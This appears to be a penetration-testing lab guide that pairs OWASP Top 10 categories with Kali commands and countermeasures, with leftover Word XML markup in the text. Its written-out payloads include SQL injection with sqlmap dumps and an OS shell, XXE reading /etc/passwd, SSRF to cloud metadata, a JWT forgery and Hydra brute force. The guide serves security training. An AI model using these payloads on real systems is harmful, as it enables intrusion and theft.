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WEB APPLICATION SECURITY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Kali Linux Attack Lab Guide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OWASP Top 10 (2021) — Attack Techniques + Countermeasures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About This Lab Guide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guide pairs each OWASP category with executable Kali Linux scripts. Each chapter covers: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How the attack works (theory + real-world examples)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Kali tool commands you can run immediately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Companion .sh script with full automation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Developer countermeasures and secure code patterns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Prerequisites: Kali Linux 2023+, a target lab environment (DVWA, bWAPP, HackTheBox, TryHackMe, or your own VM)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Source: Adapted from 'Atakowanie i Ochrona Webaplikacji' — Kuba Orlik, niebezpiecznik.pl (March 2026)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6C09" w:sz="6"/>
              <w:left w:val="single" w:color="E36C09" w:sz="6"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="6"/>
              <w:right w:val="single" w:color="E36C09" w:sz="6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36C09"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  Legal &amp; Ethical Use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scripts and techniques in this guide are for EDUCATIONAL PURPOSES ONLY.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test systems you own or have explicit written authorisation to test.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Unauthorised access to computer systems is illegal in all jurisdictions.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obtain a signed penetration testing agreement before any engagement.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00_lab_setup.sh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check, installation guide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a01_broken_access_control.sh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IDOR, path traversal, JWT attacks, open redirects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a02_cryptographic_failures.sh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check, header analysis, hash cracking, secret scan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a03_injection.sh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 probes, sqlmap, XSS payloads, CSP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a05_misconfiguration.sh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Nikto, XXE injection, error disclosure, default creds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a06_vulnerable_components.sh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WhatWeb, CMS detection, JS library fingerprinting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a07_auth_failures.sh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enum, Hydra brute force, hash cracking, session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a08_integrity_failures.sh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PHP/Java deserialization, phpggc, ysoserial, SRI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a10_ssrf.sh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SSRF endpoint discovery, payload library, filter bypasses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Lab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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">00_lab_setup.sh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Checks all required tools and prints a lab readiness report</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/00_lab_setup.sh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Required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tools below are pre-installed on Kali Linux 2023+. Run the setup script first to verify your environment.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+ Install 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Port/service scanning — apt install nmap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gobuster / ffuf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&amp; endpoint fuzzing — apt install gobuster ffuf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misconfiguration scanner — apt install nikto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SQL injection — apt install sqlmap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password brute forcing — apt install hydra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/ hashcat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hash cracking — apt install john hashcat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wfuzz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fuzzer with filter support — apt install wfuzz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technology fingerprinting — apt install whatweb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attack toolkit — pip3 install jwt_tool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operations and TLS testing — apt install openssl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interactsh-client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Out-of-band detection (OOB) — github.com/projectdiscovery/interactsh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ysoserial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deserialization payloads — github.com/frohoff/ysoserial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phpggc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gadget chain generator — github.com/ambionics/phpggc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 Environment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the TARGET variable at the top of each script before running. Recommended lab targets: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DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Damn Vulnerable Web Application) — docker run -p 80:80 vulnerables/web-dvwa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bWAPP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — docker run -p 80:80 raesene/bwapp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OWASP Juice Shop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — docker run -p 3000:3000 bkimminich/juice-shop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TryHackMe / HackTheBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — connect via VPN, use assigned IP as TARGET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Lab startup commands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Quick start — verify your Kali lab is ready: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bash kali_lab/00_lab_setup.sh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Set your target (edit the TARGET variable in each script):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TARGET="http://192.168.1.100"     # IP address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TARGET="http://dvwa.local"         # hostname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TARGET="http://10.10.10.50"        # HackTheBox / TryHackMe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Run a specific module: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bash kali_lab/a01_broken_access_control.sh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bash kali_lab/a03_injection.sh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A01:2021 — Broken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Common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breach / Privilege escalation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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a01_broken_access_control.sh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Automated IDOR cycling, path traversal bypass testing, JWT alg:none attack, open redirect detection</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a01_broken_access_control.sh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IDOR — Insecure Direct Object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IDOR occurs when a server uses user-supplied input to look up objects without verifying the requesting user is authorised to access them. It is the single most reported vulnerability class on bug bounty platforms.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IDOR enumeration loop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Manual IDOR test — cycle through user IDs with curl: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for id in $(seq 1 50); do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STATUS=$(curl -s -o /dev/null -w "%{http_code}"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-H "Cookie: session=YOUR_COOKIE"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"http://TARGET/api/user?id=$id")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[ "$STATUS" == "200" ] &amp;&amp; echo "[HIT] id=$id returned data!"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done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 Burp Suite: Intruder &gt; Sniper &gt; payload = numbers 1-1000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Sort results by response length to spot different-sized (= different user) responses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Path Traversal &amp; Access Control Bypass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Path traversal bypass payloads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Classic ..;/ bypass (works on some Tomcat / Spring Boot versions):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-v "http://TARGET/public/..;/admin/dashboard"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URL-encoded traversal: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-v "http://TARGET/%2e%2e%3b/admin/"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Trailing slash bypass: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-v "http://TARGET/admin/"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Double URL encoding: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-v "http://TARGET/%252e%252e%252f/admin/"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 with ffuf — auto-fuzz bypass patterns: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ffuf -u "http://TARGET/FUZZ/admin"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-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt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-mc 200,301,302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JWT Attacks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JSON Web Tokens are commonly used for authentication and authorisation. Several critical implementation flaws allow privilege escalation without knowing the secret key.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JWT attack commands (jwt_tool)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── jwt_tool: the Swiss Army knife for JWT attacks ──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1. Decode and inspect a JWT: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python3 jwt_tool.py eyJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoidXNlciJ9.SIG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2. Test ALL known attacks automatically (scan mode):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python3 jwt_tool.py &lt;TOKEN&gt; -t http://TARGET/api/admin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-rh 'Authorization: Bearer JWT' -M pb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3. alg:none attack (remove signature):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python3 jwt_tool.py &lt;TOKEN&gt; -X a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4. RS256 → HS256 key confusion (sign with public key as HMAC secret):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python3 jwt_tool.py &lt;TOKEN&gt; -X k -pk server_public.pem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5. Brute-force HS256 secret key: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python3 jwt_tool.py &lt;TOKEN&gt; -C -d /usr/share/wordlists/rockyou.txt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6. Tamper payload — escalate role to admin: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python3 jwt_tool.py &lt;TOKEN&gt; -T  # interactive tamper mode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Manual alg:none construction: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HEADER=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-')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PAYLOAD=$(echo -n '{"role":"admin","sub":"user1"}' | base64 | tr -d '=' | tr '/+' '_-')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echo "Forged: ${HEADER}.${PAYLOAD}."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Countermeasures for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check authorisation server-side on every request — never trust client-supplied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indirect object references (UUIDs/GUIDs) instead of sequential integers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Deny access by default; whitelist permitted actions per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JWT algorithm server-side: jwt.verify(token, secret, { algorithms: ['HS256'] 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CSRF tokens or SameSite=Strict cookies on all state-changing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open redirect destinations against an allowlist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A02:2021 — Cryptographic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data exposure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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a02_cryptographic_failures.sh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TLS version/cipher testing, security header audit, hash speed benchmarks, secret scanning with grep patterns</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a02_cryptographic_failures.sh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TLS Configuration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TLS testing commands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Check certificate details (expiry, issuer, subject):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echo | openssl s_client -connect TARGET:443 2&gt;/dev/null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| openssl x509 -noout -dates -subject -issuer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 for deprecated SSLv3 (POODLE attack):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openssl s_client -ssl3 -connect TARGET:443 2&gt;&amp;1 | grep -E 'CONNECTED|alert|failure'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 for deprecated TLS 1.0 / 1.1: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openssl s_client -tls1 -connect TARGET:443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openssl s_client -tls1_1 -connect TARGET:443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Comprehensive TLS analysis with testssl.sh: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bash testssl.sh TARGET:443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bash testssl.sh --severity HIGH TARGET:443   # only HIGH/CRITICAL findings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nmap TLS cipher enumeration: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nmap --script ssl-enum-ciphers -p 443 TARGET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Security Header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Security header commands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Dump all response headers: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-I http://TARGET | sort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Check for specific security headers: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-I http://TARGET | grep -iE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'Strict-Transport|Content-Security|X-Frame|X-Content-Type|Referrer-Policy'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Automated header scanner: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nikto -h http://TARGET -Plugins headers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Online: https://securityheaders.com/?q=TARGET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Hash Cracking Speed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Password cracking commands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Benchmark MD5 vs bcrypt cracking speed (hashcat):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hashcat -b -m 0    --force    # MD5       → billions/sec on GPU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hashcat -b -m 100  --force    # SHA-1     → billions/sec on GPU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hashcat -b -m 1400 --force    # SHA-256   → hundreds of millions/sec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hashcat -b -m 3200 --force    # bcrypt    → ~hundreds/sec — 50M× harder!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Dictionary attack on MD5 hashes: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hashcat -m 0 -a 0 md5_hashes.txt /usr/share/wordlists/rockyou.txt --force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Rules-based mutation (tries password, Password, p@ssword, etc.):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hashcat -m 0 -a 0 hashes.txt rockyou.txt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-r /usr/share/hashcat/rules/best64.rule --force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John the Ripper — auto-detects hash format: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john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt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john --show hashes.txt    # display cracked passwords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Secret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Secret scanning commands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Grep for hardcoded secrets in source code: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grep -rniE "password\s*=\s*['\"][^'\"]{4,}['\"]" . --include='*.py' --include='*.js' --include='*.php'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grep -rniE "AKIA[0-9A-Z]{16}" .    # AWS Access Key IDs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grep -rniE "-----BEGIN.*PRIVATE KEY" .   # Private keys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trufflehog — scans git history for secrets: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pip3 install trufflehog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trufflehog git file://./ --only-verified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trufflehog github --repo=https://github.com/ORG/REPO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gitleaks — fast SAST for secrets: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gitleaks detect --source . -v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gitleaks detect --source . --report-format json --report-path report.json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Countermeasures for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bcrypt (cost≥12), scrypt, or Argon2id for password hashing — never MD5/SHA-1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all secrets in environment variables or a secrets manager (Vault, AWS Secrets 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HSTS: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload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pre-commit hooks (gitleaks, git-secrets) to prevent committing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trufflehog or gitleaks in CI/CD to scan pull requests automatically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A03:2021 — Injection (SQLi + XSS)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DB dump / account takeover / script execution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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a03_injection.sh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SQL error probes, sqlmap automation (GET/POST/cookie), XSS reflection testing, payload library, CSP analysis</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a03_injection.sh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SQL Injection — Manual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Manual SQLi detection steps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Step 1: Test for SQL errors with a single quote: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"http://TARGET/search?q='"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"http://TARGET/search?q=1'--"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"http://TARGET/search?q=1 AND 1=2"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Step 2: Check response for DB error signatures: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MySQL:      'You have an error in your SQL syntax'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MSSQL:      'Unclosed quotation mark'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PostgreSQL: 'syntax error at or near'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Oracle:     'ORA-00933: SQL command not properly ended'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Step 3: UNION-based extraction (find number of columns first):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"http://TARGET/search?q=1' ORDER BY 1--"   # No error = at least 1 col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"http://TARGET/search?q=1' ORDER BY 2--"   # No error = at least 2 cols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"http://TARGET/search?q=1' ORDER BY 3--"   # Error = 2 cols total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Step 4: Extract data with UNION SELECT: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"http://TARGET/search?q=0' UNION SELECT database(),user()--"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"http://TARGET/search?q=0' UNION SELECT table_name,null FROM information_schema.tables--"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"http://TARGET/search?q=0' UNION SELECT username,password FROM users--"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Blind SQLi — boolean-based (true vs false response differs):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"http://TARGET/search?q=1' AND 1=1--"   # Normal response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"http://TARGET/search?q=1' AND 1=2--"   # Different response → blind SQLi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Time-based blind SQLi (no output difference):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"http://TARGET/search?q=1'; IF(1=1) WAITFOR DELAY '0:0:5'--"   # MSSQL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"http://TARGET/search?q=1' AND SLEEP(5)--"                       # MySQL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sqlmap — Automated SQL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sqlmap commands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GET-based SQLi scan — discover DBs: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sqlmap -u "http://TARGET/search?q=test" --batch --dbs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POST-based SQLi (login form):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sqlmap -u "http://TARGET/login" --data="user=admin&amp;pass=test" --batch --dbs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With session cookie (authenticated scan):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sqlmap -u "http://TARGET/profile?id=1"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--cookie="PHPSESSID=abc123" --batch --dbs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Deeper scan: higher level and risk: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sqlmap -u "http://TARGET/page?id=1" --batch --level=5 --risk=3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Dump specific table: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sqlmap -u "http://TARGET/search?q=1" --batch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-D target_db -T users --dump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Time-based blind SQLi only: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sqlmap -u "http://TARGET/page?id=1" --technique=T --batch --dbms=mysql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Scan all forms on a page automatically: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sqlmap -u "http://TARGET/login" --forms --batch --dbs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OS shell attempt (requires stacked queries or file write perms):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sqlmap -u "http://TARGET/page?id=1" --os-shell --batch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XSS — Reflected &amp; Stored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XSS testing commands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 for basic reflection (check if input appears in response):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CANARY="XSS$(date +%s)"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"http://TARGET/search?q=$CANARY" | grep -q "$CANARY"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&amp;&amp; echo 'INPUT IS REFLECTED — test XSS payloads!' || echo 'Not reflected'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XSS payloads — test each one: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'http://TARGET/search?q=&lt;script&gt;alert(1)&lt;/script&gt;' | grep -i '&lt;script&gt;'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'http://TARGET/search?q=&lt;img src=x onerror=alert(1)&gt;'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'http://TARGET/search?q=&lt;svg onload=alert(1)&gt;'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'http://TARGET/search?q="&gt;&lt;img src=x onerror=alert(1)&gt;'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Fuzz with wfuzz XSS wordlist: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wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt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--hc 404 "http://TARGET/search?q=FUZZ"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dalfox — automated XSS scanner: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go install github.com/hahwul/dalfox/v2@latest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dalfox url "http://TARGET/search?q=test"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dalfox url "http://TARGET/search?q=test" --cookie 'session=abc'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DOM XSS — look in browser JS console for sink usage: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document.write(), innerHTML, eval(), setTimeout('...')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Check: document.location.hash, document.referrer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Countermeasures for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parameterised queries / prepared statements — never string concatenation in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Sanitise HTML output with DOMPurify (JS), HTMLPurifier (PHP), or HtmlSanitizer (.NET)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Content-Security-Policy: script-src 'self' 'nonce-{random}' to block inline XSS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X-Frame-Options: SAMEORIGIN and X-Content-Type-Options: nosniff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Suppress database error details in production; log them server-side only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A05:2021 — Security Misconfiguration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Common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disclosure / RCE / full compromise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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a05_misconfiguration.sh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Nikto scan, directory listing detection, XXE injection testing, error disclosure probing, default credential check</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a05_misconfiguration.sh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Web Server Scanning (Nikto)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Nikto and nmap web scanning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Basic nikto scan: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nikto -h http://TARGET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Full scan with all plugins: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nikto -h http://TARGET -C all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Scan with session cookie (authenticated):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nikto -h http://TARGET -id admin:password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Output to file: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nikto -h http://TARGET -Format htm -output nikto_report.html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Limit scan time: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nikto -h http://TARGET -maxtime 120s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nmap NSE web scripts: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nmap -sV --script=http-shellshock,http-title,http-headers,http-auth TARGET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nmap --script=http-enum TARGET    # enumerate web files/directories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XXE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XXE injection attacks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Basic XXE: read server files via XML endpoint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-X POST -H 'Content-Type: application/xml'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-d '&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;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]&gt;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&lt;data&gt;&amp;xxe;&lt;/data&gt;'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http://TARGET/api/parse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XXE via SSRF (probe internal network):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-X POST -H 'Content-Type: application/xml'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-d '&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [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&lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;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]&gt;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&lt;data&gt;&amp;xxe;&lt;/data&gt;'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http://TARGET/api/parse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XXE via file upload (SVG with embedded entity):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cat &gt; /tmp/xxe.svg &lt;&lt; 'EOF'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&lt;?xml version="1.0" standalone="yes"?&gt;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&lt;!DOCTYPE svg [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;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&lt;svg&gt;&lt;text&gt;&amp;xxe;&lt;/text&gt;&lt;/svg&gt;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EOF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-F 'file=@/tmp/xxe.svg' http://TARGET/upload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Blind XXE via OOB DNS (requires interactsh):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Start interactsh-client, get your URL (e.g. abc.oast.pro)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Payload: &lt;!ENTITY % xxe SYSTEM "http://abc.oast.pro/xxe"&gt; %xxe;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Countermeasures for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external XML entity processing: xmlInputFactory.setProperty("isSupportingExternalEntities", false) (Java)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PHP: libxml_disable_entity_loader(true) before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.NET: XmlDocument.XmlResolver =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expose stack traces in production responses — log internally and return generic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/phpinfo.php, /server-status, /.git/, /backup/ paths from production servers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A06:2021 — Vulnerable and Outdated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Widespread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system compromise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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a06_vulnerable_components.sh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WhatWeb fingerprinting, nmap service versions, CMS detection (WordPress/Drupal/Joomla), JS library version extraction, local dependency scanning commands</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a06_vulnerable_components.sh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Technology Fingerprinting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Technology fingerprinting commands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WhatWeb — identify web technologies, frameworks, versions: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whatweb http://TARGET -v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whatweb http://TARGET -a 3   # aggressive mode (more requests)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nmap service version detection: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nmap -sV -p 80,443,8080,8443 TARGET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nmap -sV --script=http-generator,http-server-header TARGET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Wappalyzer CLI (alternative to browser extension):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npm install -g wappalyzer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wappalyzer http://TARGET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Check for server version in headers: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-I http://TARGET | grep -iE 'Server:|X-Powered-By:|X-AspNet'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WordPress scanning (wpscan):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wpscan --url http://TARGET --enumerate u,vp,vt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wpscan --url http://TARGET --api-token YOUR_TOKEN --enumerate vp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JoomScan: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joomscan -u http://TARGET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CMSMap (detects WordPress, Joomla, Drupal, Moodle):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cmsmap http://TARGET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Dependency Vulnerability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Dependency scanning commands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Node.js / npm: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npm audit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npm audit --json | jq '.vulnerabilities | keys[]'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npx better-npm-audit audit --level high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Python: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pip3 install safety &amp;&amp; safety check -r requirements.txt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pip3 install pip-audit &amp;&amp; pip-audit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Java (Maven):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mvn org.owasp:dependency-check-maven:check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Docker images (Trivy):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trivy image nginx:1.18 --severity HIGH,CRITICAL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trivy fs . --severity HIGH,CRITICAL   # scan filesystem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Universal (OWASP Dependency-Check):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dependency-check --scan /path/to/project --format HTML --out /tmp/report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Snyk (requires free account):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npm install -g snyk &amp;&amp; snyk auth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snyk test                    # test Node.js project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snyk test --all-projects     # test all languages in monorepo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snyk container test nginx:1.18   # test Docker image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Countermeasures for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a Software Bill of Materials (SBOM) with all dependency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npm audit / pip-audit / trivy in CI/CD on every pull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Dependabot or Renovate for automated dependency update PRs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Pin dependency versions in lockfiles (package-lock.json, requirements.txt)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unused dependencies — every package is potential attack surface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A07:2021 — Identification &amp; Authentication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takeover / full system access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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a07_auth_failures.sh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Username enumeration via response differences, Hydra HTTP/SSH brute force, rate limiting check, hashcat/john hash cracking, session cookie security analysis</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a07_auth_failures.sh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Username Enumeration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Username enumeration techniques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Enumerate users via response size difference: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for user in admin root user test guest support; do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SIZE=$(curl -s -o /dev/null -w '%{size_download}'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-X POST -d "username=$user&amp;password=wrong"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http://TARGET/login)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echo "$user: ${SIZE} bytes"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done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Different size = different error message = username exists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Timing-based enumeration (valid users take longer due to bcrypt):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for user in admin root user test; do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TIME=$(curl -s -o /dev/null -w '%{time_total}'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-X POST -d "username=$user&amp;password=wrong"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http://TARGET/login)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echo "$user: ${TIME}s"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done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Burp Intruder method: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Payload: username list from /usr/share/seclists/Usernames/top-usernames-shortlist.txt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Grep match: 'Invalid password' (= user exists) vs 'User not found' (= no such user)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Brute Force — Hydra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Brute force commands (Hydra)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HTTP POST form brute force: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hydra -l admin -P /usr/share/wordlists/rockyou.txt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TARGET http-post-form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'/login:username=^USER^&amp;password=^PASS^:Invalid credentials'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-V -t 10 -I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HTTP POST with multiple usernames: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hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt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-P /usr/share/wordlists/rockyou.txt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TARGET http-post-form '/login:user=^USER^&amp;pass=^PASS^:Incorrect' -t 16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HTTP Basic Auth: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hydra -l admin -P /usr/share/wordlists/rockyou.txt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http-get://TARGET/admin/ -V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SSH (adjust threads to avoid account lockout!):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hydra -l root -P /usr/share/wordlists/rockyou.txt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ssh://TARGET -t 4 -V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Check for rate limiting (send 10 rapid requests):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for i in $(seq 1 10); do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CODE=$(curl -s -o /dev/null -w '%{http_code}'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-X POST -d 'username=admin&amp;password=wrong' http://TARGET/login)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echo "Attempt $i: HTTP $CODE"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done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HTTP 429 = rate limited (good!), 200 or 302 every time = vulnerable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Session Security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Session security analysis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Check session cookie flags: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-I http://TARGET/login | grep -i 'Set-Cookie'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Look for: HttpOnly, Secure, SameSite=Strict/Lax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Analyse cookie entropy (session predictability):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SESSION=$(curl -s -c /tmp/cookies.txt -o /dev/null http://TARGET/login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&amp;&amp; grep -oP '(?&lt;=session\t)\S+' /tmp/cookies.txt)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echo "Session token: $SESSION (length: ${#SESSION})"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echo "&lt; 16 chars = weak; 32+ hex chars = OK"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 session fixation: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1. Get session ID before login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PRE_LOGIN=$(curl -s -c /tmp/pre.txt -o /dev/null -w '%header{set-cookie}'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http://TARGET/login | grep -oP 'session=[^;]+')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2. Log in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3. Check if session ID changed (it should!)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POST_LOGIN=$(curl -s -c /tmp/post.txt -b /tmp/pre.txt -o /dev/null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-w '%header{set-cookie}' -X POST -d 'user=admin&amp;pass=admin'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http://TARGET/login | grep -oP 'session=[^;]+')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[ "$PRE_LOGIN" == "$POST_LOGIN" ]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&amp;&amp; echo 'SESSION FIXATION VULNERABLE!'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|| echo 'Session rotated on login (good)'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Countermeasures for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bcrypt/Argon2id for passwords; implement account lockout after 5-10 failed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Enforce MFA on all accounts, especially admin/privileged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Rotate session token on login (prevent session fixation)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cookies with: Secure; HttpOnly; SameSite=Strict; Max-Age=1800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log tokens, passwords, or credentials in error messages or logs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A08:2021 — Software and Data Integrity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Remote Code Execution (RCE)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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a08_integrity_failures.sh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Serialised data detection in cookies, PHP object injection, phpggc gadget chain generation, ysoserial Java payloads, SRI hash generation</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
